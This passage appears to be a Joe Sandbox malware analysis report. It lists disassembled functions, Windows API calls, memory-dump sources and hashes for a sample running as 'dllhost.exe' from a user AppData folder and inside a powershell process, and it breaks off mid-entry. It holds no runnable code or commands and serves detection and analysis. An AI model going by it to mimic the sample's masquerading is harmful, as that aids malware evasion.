                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                              • String ID:
                                                                              • API String ID: 2102729457-0
                                                                              • Opcode ID: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                                                              • Instruction ID: fe37ef1f42e63d928baf9b7628c588a3f0f600393ee4f6b464cc40035c08f26a
                                                                              • Opcode Fuzzy Hash: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                                                              • Instruction Fuzzy Hash: FAF03A30945620EFC7216B64FE0C99B7B65BB04B0174549BEF444F11A8CBB54881CA9C
                                                                              Function 00405224 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 00405253
                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004052A4
                                                                                • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                              • String ID:
                                                                              • API String ID: 3748168415-3916222277
                                                                              • Opcode ID: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                                                              • Instruction ID: c9233ab90339d663537cd0f4838c8d9c3e37dbb77af5ce129741796423ccaa39
                                                                              • Opcode Fuzzy Hash: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                                                              • Instruction Fuzzy Hash: 4701717160060CABDF218F11ED80A9B3766EF94355F10447AF604752D0C77AAD929E2D
                                                                              Function 004038C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,7570D4C4,0040389D,004036B3,00000006,?,00000006,00000008,0000000A), ref: 004038DF
                                                                              • GlobalFree.KERNEL32(?), ref: 004038E6
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004038D7
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Free$GlobalLibrary
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 1100898210-4017390910
                                                                              • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                              • Instruction ID: 4defd9e359f6bb8273ced32a5a12906ada9a5e6c3dc807c4d7f8d8681d186cd1
                                                                              • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                              • Instruction Fuzzy Hash: 68E01233901520AFCA216F55ED04B5E77ADAF58B22F09417BF8807B2608B785C929BD8
                                                                              Function 00405B69 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Roaming,00402F2D,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\dllhost.exe,C:\Users\user\AppData\Roaming\dllhost.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B6F
                                                                              • CharPrevW.USER32(?,00000000), ref: 00405B7F
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming, xrefs: 00405B69
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrevlstrlen
                                                                              • String ID: C:\Users\user\AppData\Roaming
                                                                              • API String ID: 2709904686-2707566632
                                                                              • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                              • Instruction ID: 4f2c6dc630764ad6ed400a220cd41f8d0a4aff102c3f5ecc88be1499634875f0
                                                                              • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                              • Instruction Fuzzy Hash: F7D05EB2401920DAC3126704DC04DAF73A8EF12300746446AF841A6165D7786D818AAC
                                                                              Function 00405CA3 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                                                              • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CCB
                                                                              • CharNextA.USER32(00000000), ref: 00405CDC
                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 190613189-0
                                                                              • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                              • Instruction ID: b35bc10bc40a781af4b0b0b13ea0e0b48c2ad23c6ba402853768862ad0a65ea6
                                                                              • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                              • Instruction Fuzzy Hash: 2CF0F631204918FFDB02DFA4CD4099FBBA8EF06350B2540BAE841FB311D634DE01ABA8

                                                                              Executed Functions

                                                                              Function 04B607F8 Relevance: 21.7, Strings: 17, Instructions: 439COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.801831285.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_4b60000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'p$4'p$4'p$4'p$h%f$h%f$tPp$tPp$$p$$p$$p$$p$$p$$p$$p$$p$$p
                                                                              • API String ID: 0-3500168434
                                                                              • Opcode ID: aa460bab29a668493aced1b1e1a45fdfc1d9d6249940e57c2cfb56f71ce32e80
                                                                              • Instruction ID: 09a5df382e7f55d68823f88446ac36276623851b29057acc61a99659bc5390fb
                                                                              • Opcode Fuzzy Hash: aa460bab29a668493aced1b1e1a45fdfc1d9d6249940e57c2cfb56f71ce32e80
                                                                              • Instruction Fuzzy Hash: 9CE11931B04205DFCB28EF6ED45066ABBE2EFC5310F2484AAD946CB291DB79ED41C791
                                                                              Function 04B60048 Relevance: 8.1, Strings: 6, Instructions: 578COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.801831285.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_4b60000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'p$4'p$8#f$8#f$h%f$h%f
                                                                              • API String ID: 0-3085610555
                                                                              • Opcode ID: a6ea8b0c48f63d12f45992d066ed7d289332e9e33ef286719b4bef887b5f7655
                                                                              • Instruction ID: 6ae1fb171a560d4501563f33035d531620291973539e92c2951d592ba1f513f7
                                                                              • Opcode Fuzzy Hash: a6ea8b0c48f63d12f45992d066ed7d289332e9e33ef286719b4bef887b5f7655
                                                                              • Instruction Fuzzy Hash: 5A228034B00204DFCB25EF69C454A6ABBB2FF89310F64C4AAD8469B355DB75EC42CB91
                                                                              Function 04B62D00 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.801831285.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_4b60000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'p$4'p$$p$$p$$p
                                                                              • API String ID: 0-2334450948
                                                                              • Opcode ID: 00b40268ab206e7467671cc96a7eb36e90e4959961727d6f38f4c1772ba6a45e
                                                                              • Instruction ID: 066301d1da5eb98b7f6ddf52a5499a4f37e6df35e2116b9b01d71a40b4d1409c
                                                                              • Opcode Fuzzy Hash: 00b40268ab206e7467671cc96a7eb36e90e4959961727d6f38f4c1772ba6a45e
                                                                              • Instruction Fuzzy Hash: 7841C435B042418FEB2CAE69C440A6ABBE2EFC5310F1884FBC456CB295DB38E945D791
                                                                              Function 04B607DB Relevance: 3.9, Strings: 3, Instructions: 104COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.801831285.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_4b60000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'p$$p$$p
                                                                              • API String ID: 0-2931952147
                                                                              • Opcode ID: 8a11d9b7d56131b6d9014a8f2a6ec0719d0ca28e458efa9c7fc1ba623529b4e4
                                                                              • Instruction ID: 37857e06e00e224299798349d6c89efe1c0704598f8aaec7d95e8400906e8d62
                                                                              • Opcode Fuzzy Hash: 8a11d9b7d56131b6d9014a8f2a6ec0719d0ca28e458efa9c7fc1ba623529b4e4
                                                                              • Instruction Fuzzy Hash: FD31C630A05204DFEB24EF5AC4447A97BB2FF95310F1880E6E55A8B291D77CF980CB91
                                                                              Function 04B62CFB Relevance: 3.8, Strings: 3, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.801831285.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_4b60000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'p$$p$$p
                                                                              • API String ID: 0-2931952147
                                                                              • Opcode ID: b8abc9605afa67f5bd1164a82f72358366a7b0857ba99dfc52e8b670973d4991
                                                                              • Instruction ID: 96f321a6a38ab1931d22f6c4747341c4fe6cb9f123632a893acf65c0fdcbc17c
                                                                              • Opcode Fuzzy Hash: b8abc9605afa67f5bd1164a82f72358366a7b0857ba99dfc52e8b670973d4991
                                                                              • Instruction Fuzzy Hash: F9218031B00205DFFF2CEE55C940A69B7B5EF84711F0880FAC81A8B1A0E738E941EB51
                                                                              Function 002A6853 Relevance: 1.4, Instructions: 1362COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bcd4f7e251f37cb7f4658fc64381296b1405e48efdd7b0bb8c35ee1b0c365f8b
                                                                              • Instruction ID: 1ebdec76db902a39dfa9bc8f8264596c962bfbdfa7e16eeb5c9177a3d1869e16
                                                                              • Opcode Fuzzy Hash: bcd4f7e251f37cb7f4658fc64381296b1405e48efdd7b0bb8c35ee1b0c365f8b
                                                                              • Instruction Fuzzy Hash: 68C2C270A093849FCB02DF68D894A9DBFB1AF46314F198496D484DB363CB34DC1ACBA5
                                                                              Function 002A9D28 Relevance: .4, Instructions: 429COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c7aa053a9ab608950ec745560178aa8325ed42913618c377e0f11e8c8d73ac1c
                                                                              • Instruction ID: 23963711ee2425726a3faa4cc2fab0f0bc72562669887ad3eaec5ddb42a601d6
                                                                              • Opcode Fuzzy Hash: c7aa053a9ab608950ec745560178aa8325ed42913618c377e0f11e8c8d73ac1c
                                                                              • Instruction Fuzzy Hash: 54022D74A10219DFDB05CF98C884A9EBBF2FF89310F248559E805AB365CB71ED91CB90
                                                                              Function 002A8A40 Relevance: .4, Instructions: 378COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2da5ca4df990d42b6ade154fb317d3bf69fec3c8be3eb3c97f88cf33ec9904c6
                                                                              • Instruction ID: eeeef71b3caebaa0d7f5a4c83e9515b831dcf439a92081a0b5e6b3dd181728fd
                                                                              • Opcode Fuzzy Hash: 2da5ca4df990d42b6ade154fb317d3bf69fec3c8be3eb3c97f88cf33ec9904c6
                                                                              • Instruction Fuzzy Hash: C7F15B70A11249DFCB05CF98D490A9DFBB2FF49314F258599E844AB366CB31EC95CB90
                                                                              Function 002A9413 Relevance: .3, Instructions: 340COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 105d47d70ac952123ea30ca19b5c6477311c41b4da09cc5c34d9f17541f602d3
                                                                              • Instruction ID: 124eb608670e44be35c7df10cfdeb30d46dae6a0efaf7fa1460d85d7b4fe598c
                                                                              • Opcode Fuzzy Hash: 105d47d70ac952123ea30ca19b5c6477311c41b4da09cc5c34d9f17541f602d3
                                                                              • Instruction Fuzzy Hash: 6CE14C74A10219AFDB05CF99D480A9EFBB2FF89310F648559E805AB355CB31ED92CF90
                                                                              Function 002A3217 Relevance: .3, Instructions: 339COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 05d248d81319725d4f3a16b260285e9d4de639338df37867a376119ee5b841bf
                                                                              • Instruction ID: 8673830d24704a14d9759565818954e1fbde02687af97afb5230448f13a15737
                                                                              • Opcode Fuzzy Hash: 05d248d81319725d4f3a16b260285e9d4de639338df37867a376119ee5b841bf
                                                                              • Instruction Fuzzy Hash: E3E16E70A142499FCB05CFA8D494B9DBFB1BF4A314F298099E844AB352CB71DD56CB90
                                                                              Function 002A9CBA Relevance: .1, Instructions: 138COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6dc06fa3f0a1d827a3613172e8aaac55e252835527bd3e64b397c55e7773a17f
                                                                              • Instruction ID: 30a084c7d87a7f786f05e0c7dcda95ddbd9b0c4230be5c9afbb9dfc9c289eb25
                                                                              • Opcode Fuzzy Hash: 6dc06fa3f0a1d827a3613172e8aaac55e252835527bd3e64b397c55e7773a17f
                                                                              • Instruction Fuzzy Hash: 3B516E70A046058FCB15CF58C990AAEBBB2FF49310F298199E955E73A1C735AC91CB91
                                                                              Function 002A8A10 Relevance: .1, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 519606e7bb373df8c3fef962a6684d118f516340ce9dd1128abbb8e890db618a
                                                                              • Instruction ID: eb4b5e32d2acf5f1ebf7ec04759a3d4d03f196e770ef6a09b3dfa4f195a7b034
                                                                              • Opcode Fuzzy Hash: 519606e7bb373df8c3fef962a6684d118f516340ce9dd1128abbb8e890db618a
                                                                              • Instruction Fuzzy Hash: CF316B70A042458FCB11CF5CC8909AAFBF1FF4A310B25869AD944EB352CB35EC51CBA0
                                                                              Function 0019EEB4 Relevance: .1, Instructions: 76COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775651773.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_19d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b0a141373a2c32db71c05827b683ba50be49d8dd4f99dec526298a3969414f9
                                                                              • Instruction ID: f0092c60eb54f35c6fe5ab4d09b6195edcdf0b0ed44e92461cafbec55a3f616d
                                                                              • Opcode Fuzzy Hash: 5b0a141373a2c32db71c05827b683ba50be49d8dd4f99dec526298a3969414f9
                                                                              • Instruction Fuzzy Hash: 3C21D6B5604340EFDF05CF54D9C4B26BFA2FB84714F24C5AAE8094A256C336D856CBA1
                                                                              Function 0019EEAF Relevance: .1, Instructions: 57COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775651773.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_19d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 83aee6eae617b757139e57b205b5b986050a0917db128b2ff60648e8a4d51f7d
                                                                              • Instruction ID: e2e8a9a6dc7a5de4c15eb1224084d4e21fd3f967016298df26ad4042adc5d905
                                                                              • Opcode Fuzzy Hash: 83aee6eae617b757139e57b205b5b986050a0917db128b2ff60648e8a4d51f7d
                                                                              • Instruction Fuzzy Hash: D8219D76504240DFDF06CF10D9C4B16BFA2FB44314F24C5AAE8494A256C33AD86ACFA1
                                                                              Function 0019D01D Relevance: .0, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775651773.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_19d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8fe94fd460b5fb1884ad6ed34f1b68ab1a575a5ee305ccaf6a0d3d2f3d6b2454
                                                                              • Instruction ID: 8b872844e4e96289b07614c75a5c857dfbc60c64760dc951b5d9c83d024f044c
                                                                              • Opcode Fuzzy Hash: 8fe94fd460b5fb1884ad6ed34f1b68ab1a575a5ee305ccaf6a0d3d2f3d6b2454
                                                                              • Instruction Fuzzy Hash: 95018471504340AAEB104E15DC84B66BF98EF41724F2C855AFC494F286C7799845C6B1
                                                                              Function 0019D01C Relevance: .0, Instructions: 36COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775651773.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_19d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9b2790ffaa31424cea53fb80af2b8d9279f50d8c6395cf85138d81afb0f36e0f
                                                                              • Instruction ID: 5bccc1b75e4d53186136e51cde5a73356bb70c45f31f614e3f7856614ddcc691
                                                                              • Opcode Fuzzy Hash: 9b2790ffaa31424cea53fb80af2b8d9279f50d8c6395cf85138d81afb0f36e0f
                                                                              • Instruction Fuzzy Hash: 1FF06271404344AFEB108E16DCC4B66FFD8EB51724F18C95AED494F286C3799C45CAB1
                                                                              Function 002A8023 Relevance: .0, Instructions: 34COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0ec032cd869656250514e4f28bf0c2c93990553cc0d617c83ee370ab10fb3e27
                                                                              • Instruction ID: 1145993005b6d5826b91b3643d8f38b4da7932bf5a9e28c8cf35e130037bf506
                                                                              • Opcode Fuzzy Hash: 0ec032cd869656250514e4f28bf0c2c93990553cc0d617c83ee370ab10fb3e27
                                                                              • Instruction Fuzzy Hash: BFF0F631A002049FCB40CB98C8456AEFBB6FFC8320B248159D555A7294CB35AC12CB50
                                                                              Function 002A31BF Relevance: .0, Instructions: 33COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 947727c26622c16adf986b4970d9a437a0101bb11a3d505b8f935ce9e662f23d
                                                                              • Instruction ID: a45f26c250dbec6e4f36986d1a84e1d64e41527fe657e7c399e2c0ded5626a54
                                                                              • Opcode Fuzzy Hash: 947727c26622c16adf986b4970d9a437a0101bb11a3d505b8f935ce9e662f23d
                                                                              • Instruction Fuzzy Hash: 36F09031A00105DFCB14CF98DC849AEF7B2FFC8320B748259E955A76A4CB76AD12CB50
                                                                              Function 002AAA7A Relevance: .0, Instructions: 31COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
